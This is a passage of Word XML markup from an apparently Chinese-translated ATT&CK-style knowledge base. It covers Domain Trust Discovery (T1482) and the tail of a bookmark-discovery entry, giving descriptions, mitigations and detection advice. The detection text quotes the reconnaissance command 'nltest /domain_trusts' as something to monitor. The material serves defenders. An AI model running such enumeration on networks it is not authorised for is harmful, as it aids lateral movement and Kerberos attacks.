        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于滥用系统功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36FE63" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9E698" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于收集浏览器书签信息的操作的进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行监视</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。具有内置功能的远程访问工具可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接交互以收集信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA02BC2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当攻击者学习环境时，系统和网络发现技术通常在整个操作中发生。数据和事件不应孤立地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看，而应作为一系列行为的一部分，根据获得的信息，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00964BC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能导致其他活动，如收集和渗透。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBA9D1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676E5F9C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>域信任发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="436007F7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1056D5B7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1482</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E51927D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A6DAA6A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2F78A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743477D4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B90F46" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志，</w:t>
            </w:r>
            <w:r>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程命令行参数，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE60637" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Dave Westgard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>Elia Florio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>Mnemonic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>RedHuntLabs (@redhuntlabs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62892BBE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00973350" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="561E76CE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0014724C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C0A223" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会尝试收集域信任关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的信息，用于识别</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多域</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>林环境中的横向移动机会。域信任提供了一种机制，使域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r>
        <w:t>可以被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>另外一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问。域信任允许受信任域的用户访问信任域中的资源。发现的信息可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有助于攻击者实施</w:t>
      </w:r>
      <w:r w:rsidRPr="0006351E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0006351E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全识别符注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0006351E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据传递攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0006351E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="0006351E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动目录攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DSEnumerateDomainTrusts</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win32 API</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来枚举域信任。已知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nltest</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来枚举域信任。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1908BC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="7477"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="4D6FA464" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4170DCFA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="21DA4401" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="5D1A45D5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F027BDA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5626C6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在现有域</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>林中映射信任关系，并将信任关系数量保持在最小范围。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="1B0F80BC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F5D64B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId172" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EC3F22">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="192AD3E4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对敏感域采取网络分区。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CCA7AE6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED991C9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBAA9C1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F33DF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>nltest /domain_trusts</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DSEnumerateDomainTrusts</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win32 API</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看</w:t>
      </w:r>
      <w:r>
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域信任发现相关的活动。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>也可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
